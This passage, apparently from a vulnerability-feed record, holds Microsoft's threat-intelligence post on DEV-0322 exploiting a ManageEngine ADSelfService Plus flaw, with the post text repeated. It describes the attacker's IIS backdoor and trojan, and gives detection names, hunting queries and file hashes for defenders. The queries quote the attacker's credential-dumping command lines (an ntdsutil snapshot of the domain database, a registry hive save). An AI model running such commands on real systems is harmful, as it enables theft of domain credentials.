_ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd__.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. This module hooks into the BeginRequest IIS http event and looks for custom commands and arguments being passed via the Cookies field of the HTTP header.\n\n![Screenshot of request headers using encoded request from the controller to the victim machine](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig1-Encoded-request.png)\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution for _cmd.exe_ and PowerShell commands. It also provides DEV-0322 with the ability to direct download and upload of files to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n![Screenshot of Base64-encoded ccc.exe](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig2-Base-64-encoded-command.png)\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from _w3wp.exe_ process after _ccc.exe is_ dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _<ZimbraServer>/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _<query>(in:\\"inbox\\" or in:\\"junk\\") is:unread</query>_)\n * Read email\n * Send email (e.g., _Subject: __[AutoReply] I've received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name: \n * Synacor. Inc.\n * File description: \n * Zimbra Soap Suites\n * Zimbra Soap Tools\n * Internal name: \n * newZimbr.dll\n * zimbra-controller-dll.dll\n * Original filename: \n * newZimbr.dll\n * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**** **\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**** **\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\u200b\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * 'Zebracon' high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor's post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses other additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name: **Surface devices with the CVE-2021-40539 vulnerability \n**Description: **Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name: **Hunt for suspicious dropped files post-exploitation \n**Description: **Look for suspicious files dropped the the threat actor\u2019s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat \", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Increase the risk score of command accessing file also seen \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name: **Hunt for command lines observed used by the DEV-0322 actor \n**Description: **Look for suspicious command lines that are used as part of the threat actor's post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for static cmd lines and dynamic one using regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 \nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-11-09T00:24:55", "type": "mssecure", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-11-09T18:22:59", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and inform our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n![Screenshot of commands related to credential dumping](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Commands-aa.png)\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n![Screenshot of command for calling elrs.exe](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Commands-b-6189b796bd58d.png)\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n![Screenshot of command for moving laterally and dropping a custom IIS module](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Commands-c-6189b7a102d37.png)\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd__.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. This module hooks into the BeginRequest IIS http event and looks for custom commands and arguments being passed via the Cookies field of the HTTP header.\n\n![Screenshot of request headers using encoded request from the controller to the victim machine](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig1-Encoded-request.png)\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution for _cmd.exe_ and PowerShell commands. It also provides DEV-0322 with the ability to direct download and upload of files to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n![Screenshot of Base64-encoded ccc.exe](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig2-Base-64-encoded-command.png)\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from _w3wp.exe_ process after _ccc.exe is_ dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _<ZimbraServer>/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _<query>(in:\\"inbox\\" or in:\\"junk\\") is:unread</query>_)\n * Read email\n * Send email (e.g., _Subject: __[AutoReply] I've received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name: \n * Synacor. Inc.\n * File description: \n * Zimbra Soap Suites\n * Zimbra Soap Tools\n * Internal name: \n * newZimbr.dll\n * zimbra-controller-dll.dll\n * Original filename: \n * newZimbr.dll\n * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**** **\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**** **\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\u200b\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * 'Zebracon' high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor's post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses other additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name: **Surface devices with the CVE-2021-40539 vulnerability \n**Description: **Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name: **Hunt for suspicious dropped files post-exploitation \n**Description: **Look for suspicious files dropped the the threat actor\u2019s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat \", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Increase the risk score of command accessing file also seen \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name: **Hunt for command lines observed used by the DEV-0322 actor \n**Description: **Look for suspicious command lines that are used as part of the threat actor's post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for static cmd lines and dynamic one using regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 